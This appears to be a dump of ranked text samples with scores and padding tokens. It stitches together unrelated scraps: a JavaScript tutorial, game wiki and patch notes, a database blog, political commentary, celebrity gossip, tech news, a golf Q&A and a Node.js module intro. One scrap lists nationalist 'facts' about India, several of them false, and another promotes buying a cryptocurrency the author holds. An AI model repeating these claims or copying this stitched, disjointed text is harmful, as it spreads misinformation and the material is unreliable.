2015.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 58; Score = 946176.0 +<|begin_of_text|>Back in the Immutability section, we wrote a function in JavaScript that doubled the highest scores from regular season games in NBA history. + +var multiplier = 2 ; var scores = [ 316, 320, 312, 370, 337, 318, 314 ]; function doubleScores ( scores ) { var newScores = []; for ( var i = 0 ; i < scores. length ; i ++ ) { newScores [ i ] = scores [ i ] * multiplier ; } return newScores ; } + +When we gave it a list of numbers as an input, it produced an expected output. + +> scores [ 316, 320, 312, 370, 337, 318, 314 ] > doubleScores ( scores ) [ 632, 640, 624, 740, 674, 636, 628 ] + +What happens if we give it an input of a different type — one that’s not a list of numbers? + +> var string = "scores" > doubleScores ( string ) [ NaN, NaN, NaN, NaN, NaN, NaN ] + +> var undefinedValue = undefined > doubleScores ( undefinedValue ) Uncaught TypeError : Cannot read property 'length' of undefined at doubleScores ( experiment. js : 7 ) at < anonymous > : 1 : 1 + +> var object = { "key" : "value" } > doubleScores ( object ) [] + +It accepts the input no matter what its type is and gives us an unexpected output. When the input is a string, it generates an array of NaN (Not-a-number) values. JavaScript doesn’t have a data type called List. It only has an array, which is like an Elm list and Elm array combined. + +When the input is an undefined value, the doubleScores function throws an error. Finally, when the input is an object, it returns an empty list. An object in JavaScript is similar to a record in Elm. It’s a collection of key value pairs. + +We want our functions to be reliable. We want them to reject inputs that don’t belong to their input sets. Can we put up some guardrails around our functions so that they can reject invalid inputs? Let’s find out. Modify the doubleScores function in experiment.js located in the beginning-elm directory like this: + +function doubleScores ( scores ) { // Reject non-list type inputs if ( Array. isArray ( scores ) === false ) { throw new Error ( "Input must be of type array" ); } +================================================================================ +Rank = 59; Score = 942080.0 +<|begin_of_text|>e ][ h Infested Terran Unit Information Description: Small Ground Unit Cost: 0 0 3 0 Attributes: Biological, Light Gauss Rifle: Targets: Ground Damage: 6 (+1) DPS: 10 (+1.6) Cooldown: 0.61 Range: 5 Infested Rockets: Targets: Air Damage: 14 (+1) DPS: 14.7 (+1.1) Cooldown: 0.95 Range: 6 Defence: 50 0 (+1) Hotkey: T Sight: 9 Speed: 1.31 Speed Multiplier on Creep: 1.3 + +Description [ edit ] + +The Infested Terran is a light, ground Zerg unit that is spawned by an Infestor using its Infested Terran spell. The Infestor throws an Infested Swarm Egg, which has 70 HP and takes three seconds to hatch. When it hatches, an Infested Terran emerges with health proportional to the percentage health of the egg, i.e. an egg that's at 50% health hatches an Infested Terran with only 50% health. The Infested Terran lasts for 21 seconds; it can attack up to 34 times during its duration, resulting in a maximum of 204 damage dealt (without armor or upgrades being taken into account). + +Use [ edit ] + +Infested Terrans are generally used in conjunction with Fungal Growth to pick off enemy drops, or deal extra damage to an army as an energy dump. Infested Terrans can be used as a form of worker harassment. As of Patch 16, Infested Terrans can be cast while the Infestor is burrowed and therefore hidden. Infestors in groups of 6 or more can tunnel into an enemy base and spawn multiple Infested Terrans to snipe key buildings like Robotics Bays or Command Centers. + +Protoss units are fairly resistant to Infested Terran; however, they can be used to add anti-air damage for a Zerg player who opted not to go for Hydralisks. They are especially effective against Interceptors as well as Phoenixes. + +Versus biomech builds, Infestors can cast Infested Terran on top of an infantry ball, and sieged Siege Tanks will splash their own units. Infested Terrans are also very useful to shoot down incoming or retreating Medivac dropships, commonly with the help of Fungal Growth to keep them in place. + +Inf +================================================================================ +Rank = 60; Score = 942080.0 +<|begin_of_text|>At Localytics we need to perform data aggregations at mind-blowing speeds. To do this, we run HP Vertica as a core component of our data platform. + +Vertica is a cluster-based, column-oriented analytics platform that provides an ANSI SQL interface with many analytics capabilities. + +My name is Konstantine Krutiy, and I lead the Vertica team at Localytics. The clusters I am responsible for contain all of our analytics data (which amount to more than 1 trillion data points). In August I presented at the HP Big Data Conference, and my session covered real-world methods for boosting query performance in Vertica. The talk was called "Extra performance out of thin air". + +At the core of this talk is the concept that every CPU cycle matters. This post is the first in a series exploring this idea as it pertains to data platform performance. + +Every CPU Cycle Matters + +Let’s start with a simple math exercise. In our equation we have CPU power on one end and a big dataset on the other. + +In terms of CPU power, the fastest enterprise-grade hardware runs at 3.7 GHz. Currently there is no numerical definition for “Big Data”, but my peers and I concede that you have “Big Data” once you cross 100 billion records. + +Now we’re ready to calculate how much time we can save if we eliminate 1 CPU cycle from each iteration. In these calculations I assume that we run on one core and eliminate one CPU cycle from the operation, which will touch each record in the dataset. + +We calculate one CPU cycle operation at 1 / 3,700,000,000 of a sec and multiply it by 100 Billion records. + +1 / 3,700,000,000 sec X 100,000,000,000 = 27 sec + +That is an oustanding result! You can clearly see that one CPU cycle can represent tens of seconds of processing time. Think about the potential here! One tiny tweak, one CPU cycle saved, and a great reduction of processing times. Let’s see how this tweak effects the real world. + +Removing CPU Cycles in the Real World + +Different data types will force Vertica to use a different number of CPU cycles to process a data point. To illustrate the concept above, we’ll choose a data type for numeric values (as numeric values generally have a very high cardinality so the database engine will need to touch many different values to produce the final result). + +The art of choosing data types + +In this exercise we have the +================================================================================ +Rank = 61; Score = 942080.0 +<|begin_of_text|>Democrats may be spending themselves (and the country) into oblivion, but some Republicans are not doing much better. The fiscal irresponsibility is pervasive, appearing not only in the party’s national leadership, but also among state legislators. prefix = o ns = "urn:schemas-microsoft-com:office:office" / Oh, sure. Republicans have put up a good front recently, objecting strenuously to the flood of spending by Democratic lawmakers. Some of their horror is doubtless genuine. Spending during Obama/Pelosi/Reid’s (as yet short) reign has increased at unprecedented levels. The nation is facing record spending and deficits—and OPR have only just begun. But it is easy for Republicans to take a purely partisan stance against Democratic spending. If they want to regain the trust of voters, they must do more. They must demonstrate their ability (and willingness) to do better. They must not only reverse recent Democratic excesses, but they must also reverse their own recent excesses. Unfortunately, it does not seem that many in the current Republican leadership have the will to take such a stand. Consider the fact that Republican National Chairman Michael Steele has spent twice as much as his predecessors, as recently reported by Politico. It would be one thing if he were spending all that money on campaign ads and get-out-the-vote efforts. But he’s not. He’s paying for limousines, world-class caterers, private airplanes—even an annual RNC meeting in Hawaii. The exodus of Republican donors during his tenure emphasizes the recklessness of his spending—and the irresponsibility of anyone in Republican leadership who is not taking action against such lack of discipline. Why should voters trust leaders like Steele with federal tax dollars when these leaders are so thoughtless with private donations? But the problem does not stop with a few spendthrift national leaders. This fiscal irresponsibility extends even to conservative states like Texas. Naturally, the election year has prompted some Republican officials to make big, splashy, headline-grabbing displays of fiscal conservatism. Well, terrific, but these same officials also made many terrible, fiscally irresponsible decisions earlier, during non-election years. Voters are thus being asked to take a leap of faith: Trust that the conservative, election-year version of these officials remain. Hope that the big government, spendthrift version of these officials will not return after the election. In general, Texas has received much praise for being fiscally conservative, but let’s face it. Texas is being graded on a +================================================================================ +Rank = 62; Score = 937984.0 +<|begin_of_text|>Hey guys, ChaosOS again. Because Blizzcon is this week all of my editors are AWOL, so I've decided to just publish this to Heroeshearth. I did get around to finishing the Muradin and Zuljin analysis which can be found here + +Spreadsheet can be found here + +Patch notes for this patch can be found here + +Junkrat + +TL;DR HP buff good, damage with Taste for Explosions is nerfed + +If you’re curious about Junkrat as a whole, check out my previous article introducing him + +Change 1 + +Stats + +Base Maximum Health increased from 1273 to 1350 + +Health Regeneration increased from 2.7 to 2.8 + +Analysis + +This 6% buff to Junkrat’s HP moves him from being equal to Valla to equal to Nova, moving him above Chromie and Raynor. As usual, the HP regen buff is simply to maintain that a hero regenerates 100% of their max HP every 480 seconds (8 minutes). + +Change 2 + +Abilities + +Frag Launcher (Q) + +Damage increased from 117 to 128 + +Analysis + +A much needed buff to Junkrat’s damage, this increases his primary damage output by 9.4%. This increases the damage for a full clip from 468 to 512. + +Change 3 + +Talents + +Level 4 + +Taste for Explosions (Q) + +Damage decreased from.75 to.5 per hit, maximum damage decreased from 150 to 100 + +Bonzer Hits (W) + +Bonus damage increased from 30 to 40% + +Gotta Trap 'Em All (E) + +Heroes hit requirement reduced from 8 to 7 + +Level 7 + +Sticky Wicket (E) + +Slow duration increased from 3 to 3.5 seconds + +Analysis + +Taste for Explosions sees a net nerf, even accounting for the base Q damage buff. Even with only 100 stacks by level 20, the base damage buff is only 24.1 while Taste for Explosions sees a 25 damage nerf. + +Bonzer Hits now adds 72 damage to Concussion Mine, up from 54. Given the difficulty of stacking this quest relative to Taste for Explosions, this is still much less added damage, but the damage does help keep it competitive when combined with the increase in push distance. + +Gotta Trap ‘Em All is a powerful talent with a powerful reward, but features an extraordinarily difficult quest. Making +================================================================================ +Rank = 63; Score = 937984.0 +<|begin_of_text|>Share + +‘Awkward’ is a great word to describe the public relationship between President Donald Trump and his beautiful wife Melania. Over the last 8 months or so, the American people have been given a front row seat into a relationship which seems to be filled with strife. After all, what marriage wouldn’t have its issues when one of the two people involved were caught on camera saying they like to grab women by the ‘pussy’, right? + +We have seen Melania make faces of disgust behind her husband’s back, refuse to hold his hand on numerous occasions, and only show affection when it seems like she almost has to. With all that said, yesterday’s antics at military facility Joint Base Andrews, may take the cake for the most awkward moment yet, since Trump’s presidency began nearly eight months ago. + +Melania Trump was on hand to introduce her husband to the service men and women at the base in Maryland. + +“It’s my great pleasure to introduce my husband, the President of the United States, Donald Trump,” stated Melania. + +As she concluded her remarks, the President slowly stepped towards her, shook her hand and then appeared to almost push or guide her off stage. Such actions would appear to be normal, had the person introducing him been another male politician or statesman, however it almost appeared as if President Trump had forgotten that this was his wife he was dealing with. A kiss, or a long hug certainly would not have been out of the ordinary in this situation. + +The US First Lady introduces her husband on stage at an event at Joint Base Andrews. He thanks her with a handshake. pic.twitter.com/fPQNoMpnWa — Caitriona Perry (@CaitrionaPerry) September 15, 2017 + +While rumors have surfaced that Melania had prepared to divorce the President prior to him unexpectedly winning the 2016 election, the event witnessed yesterday appears to show that there is a clear lack of affection within this marriage. Let’s hear your thoughts on yet another awkward moment between these two, in the comments section below.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 64; Score = 929792.0 +<|begin_of_text|>Which State Has The Highest Percentage of Forest Cover? + +Which state has the most forest land in the US, and which have made protecting evergreen wildlife a priority? Interestingly, there’s a pretty big gap between the two! The most forested state by far is Maine at 89% forest coverage, whereas the home to the largest national park in the US is Alaska. The Last Frontier is home to seven of the 10 largest US national park areas in size, with the largest being Wrangell-St. Elias. Which state has the most trees? It’s hard to say, since all trees have different sizes, but Maine is the most likely contender, with its relatively smaller pines. Its nickname is the Pine Tree State, after all, and its forest cover may relate to the fact that it’s the least densely populated state on the East Coast. While Maine is the state with the most trees, many others low on the list, like California, have made forest protection a priority. Check out our map to see more info besides which state has the largest area under forest. + +Which state has the most national parks? What is the largest national park? If you find yourself asking these questions about the national parks in the United States, check out the map below! Surprisingly the majority of the largest parks are in Alaska. This is most likely due to the fact that it was one of the last territories to become a state and its low population. How many state parks and national parks have you visited? + +Want to display this infographic on your website? You can copy the below code and paste it into your website.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 65; Score = 929792.0 +<|begin_of_text|>Here are some amazing facts that will make you more proud to be an Indian. Read on... + +India invented the Number System. Zero was invented by Aryabhatta. India never invaded any country in her last 10000 years of history. Sanskrit is the mother of all the European languages. Sanskrit is the most suitable language for computer software, according to a report in Forbes magazine, July 1987. The World's first university was established in Takshila in 700BC. More than 10,500 students from all over the world studied more than 60 subjects there. The University of Nalanda built in the 4th century BC was one of the greatest achievements of ancient India in the field of education. Ayurveda is the earliest school of medicine known to humans. Charaka, the father of medicine consolidated Ayurveda 2500 years ago. Today Ayurveda is fast regaining its rightful place in our civilization.India was the richest country on earth until the British invaded in the early 17th Century. Christopher Columbus was attracted by India's wealth. Bhaskaracharya calculated the time taken by the earth to orbit the sun hundreds of years before the astronomer Smart. Time taken by earth to orbit the sun in the 5th century - 365.258756484 days. The art of navigation was born in the river Sindh 6000 years ago. The very word Navigation is derived from the Sanskrit word NAVGATIH. The word navy is also derived from Sanskrit 'Nou'. The value of "pi" was first calculated by Budhayana, and he explained the concept of what is known as the Pythagorean Theorem. He discovered this in the 6th century long before the European mathematicians. According to the Gemological Institute of America, up until 1896, India was the only source for diamonds to the world. Algebra, trigonometry and calculus came from India. Quadratic equations were by Sridharacharya in the 11th century. The largest numbers the Greeks and the Romans used were 106 whereas Hindus used numbers as big as 10**53(10 to the power of 53) with specific names as early as 5000 BCE during the Vedic period. Even today, the largest used number is Tera 10**12(10 to the power of 12). Usage of anesthesia was well known in ancient India medicine. Detailed knowledge of anatomy, embryology, digestion, metabolism, +================================================================================ +Rank = 66; Score = 921600.0 +<|begin_of_text|>Share + +The 13 largest multi-channel video providers in the U.S. (Comcast, DirecTV and Verizon FiOS, to name three), who make up roughly 94 percent of the market share, lost about 105,000 video subscribers in 2013 — a wide 280,000-subscriber swing from 2012’s addition of 175,000. Perhaps most directly responsible for this first-ever net loss is the increasingly out-of-control hemorrhaging of subscribers on the part of top cable companies: about 1.7 million customers cut their cords in 2013. + +Despite the loss equaling only 0.1 percent of all subscribers, 2013 nonetheless marks the first year in which pay-TV giants actually came out with an overall year-end loss, according to a recent report by Leichtman Research Group. Cord-cutters the world over are muttering, “You have to start somewhere.” + +Specifically, cable companies took the biggest hit — technically, the only hit to actually result in a net loss. + +Top telephone service providers AT&T U-verse and Verizon FiOS, along with top satellite TV companies DirecTV and DISH, added a total of roughly 1.6 million new video subscribers in 2013; a total that counteracts the 1.7 million lost cable video subscribers. Thus, the total amount of subscribers among all top multi-channel video providers fell for the first time, by about 105,000, which, in the grand scheme of things, isn’t all that much. There are about 94.6 million total subscribers currently at stake with the aforementioned multi-channel video providers. + +While the loss is far from monumental, it could be interpreted as a sign of the times. Those that are wary of the recent moves by big pay-TV players, such as the Comcast-Time Warner merge, may find solace in this report. Though it should be expected that any big changes will be incremental, It’s like trying to make a 180-degree turn with the Titanic: there might not appear to be any considerable progress at any one time, but it’s turning — slowly but surely.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 67; Score = 921600.0 +<|begin_of_text|>Share + +Put all that upbeat news about Apple Pay usage on hold for a moment. A new report says that 85 percent of iPhone 6 and iPhone 6 Plus owners still haven’t used Apple’s mobile payments service. + +As of this month, 6 percent of iPhone 6 and iPhone 6 Plus owners use Apple Pay, up from 5 percent in November 2014, according to “Apple Pay By The Numbers: Adoption And Behavior,” a report presented at Innovation Project 2015 by payments-focused company PYMNTS.com and shopper insights company InfoScout. Meanwhile, 9 percent of iPhone 6 and iPhone 6 Plus owners have tried Apple Pay but aren’t currently using it, up from 4 percent in November. + +This means 85 percent of iPhone 6 and iPhone 6 Plus owners have never touched Apple Pay. This is down from 91 percent in November, but it still spotlights an uphill battle for adoption. + +“The main reason those who had tried Apple Pay in the past, but didn’t on some transactions where it was available, seems to be forgetfulness – almost a third (32 percent) said they just forgot it was an option,” according to PYMNTS.com. + +Apple should be “dead-focused” on point-of-sale and make sure there’s a trigger to compel users to use their phone instead of their card to pay, according to Jared Schrieber, co-founder and CEO of InfoScout. + +“Apple Pay is not yet salient. When it comes up, it has not registered with the [consumer] that they should use Apple Pay,” Schrieber said. “There’s something lacking there in the habit-forming action at checkout.” + +The report also notes that 31 percent of surveyed users didn’t know whether the Apple Pay-friendly merchant they were shopping at accepted the mobile payments option. Meanwhile, 20 percent of respondents said they prefer a different payment method. + +The 6 percent of iPhone 6 and iPhone 6 Plus owners who regularly use Apple Pay have positive impressions of the service, as 79 percent said it was more convenient, 77 percent said it was faster, 73 percent said it was easier to use and 70 percent said it was more secure. + +Despite the hype and eagerness of some users to make six-month-old Apple Pay a mainstream success, the current approach “doesn’t look promising,” according to David Evans, founder of management consulting firm Market Platform Dynamics. + +“Apple will need to either figure out a way to broaden the base of +================================================================================ +Rank = 68; Score = 909312.0 +<|begin_of_text|>Share + +As long as you haven’t been living under a rock for the past several months, then you have probably heard at least something about the sudden rise in value of cryptocurrencies like Bitcoin and Ethereum. These are the two most popular cryptocurrencies, both of which have seen gains of over 300% in just about 3 month’s time. + +While Bitcoin and Ethereum are the two most popular cryptocurrencies available, there are literally dozens upon dozens of others as well, and these cryptos trade on an open market daily. One such example is the Swarm City Cryptocurrency (SWT). In reality Swarm City is a “token” based on the aforementioned Ethereum cryptocurrency, and by viewing the technical analysis of recent trades, I am led to believe that now is a tremendous time to buy in. You see, technical analysis views trends, resistance, moving averages, etc. of an investment vehicle. This analysis is considered daily when trading stocks and foreign exchange currency, and now is being increasingly used in the trading of various cryptocurrencies and tokens. + +Today, Swarm City (SWT) appears to have met resistance (see photo to the right). It’s a level that the trading value of the cryptocurrency broke toward the end of last month and then shot up nearly 200% before falling back down just recently. Currently Swarm City is again at this level, this time from above, so I expect to see it bounce off this level and shoot up once again. + +If you then take a look at the daily chart (below), you will see that there is another level of resistance where Swarm City has bounced off of in the past. I expect the last red candle on this chart to drop back and for it to be followed by multiple green candles, representing a surge forward in the crypto. + +It’s possible that it will ultimately break this resistance level, and fall to the next level of resistance at 0.00075, but my guess is that we will see the bounce now at around 0.11600. If this bounce occurs, I expect to see Swarm City shoot up at least to the 0.002 level but perhaps past the 0.0025 level. + +(note: This article is my opinion only, and I am a trader of Swarm City. Currently I own the cryptocurrency.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 69; Score = 884736.0 +<|begin_of_text|>A: + +The number of dimples on a golf ball varies, depending on the manufacturer and may even be different for different models made by the same manufacturer. The dimples are usually the same size as one another, but some golf balls have several different sizes of dimple on the same ball. Any number between 300 and 500 dimples is reasonable, and 336 is a common number. Not just any number will do. Golf balls are usually covered with dimples in a highly symmetrical way, and for many values of N, it is impossible to cover the golf ball uniformly without gaps. Symmetry is important or the ball will wobble or its flight will depend on which part of the ball is forwards or sideways as the ball spins. You can get an idea of how to space dimples uniformly around a sphere by thinking about the "platonic solids" -- the tetrahedron, cube, octahedron, dodecahedron and icosahedron, and placing a dimple at the corners of an inscribed platonic solid. Variations on this theme give the corners of Buckminster Fuller’s geodesic domes, and also the possible symmetrical locations of dimples on a golf ball. + +If you’re curious about why the dimples are there in the first place, see. + +Tom J + +(published on 10/22/2007)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 70; Score = 880640.0 +<|begin_of_text|>Hey everyone! This is the second post in my new node.js modules you should know about article series. + +The first post was about dnode - the freestyle rpc library for node. + +This time I'll introduce you to node-optimist - the lightweight options parser library. This library is also written by James Halliday (SubStack), my co-founder of Browserling and Testling. + +Wonder how lightweight an options parser can be? Check this out: + +var argv = require('optimist').argv; + +And you're done! All options have been parsed for you and have been put in argv. + +Here are various use cases. First off, it supports long arguments: + +#!/usr/bin/env node var argv = require('optimist').argv; if (argv.rif - 5 * argv.xup > 7.138) 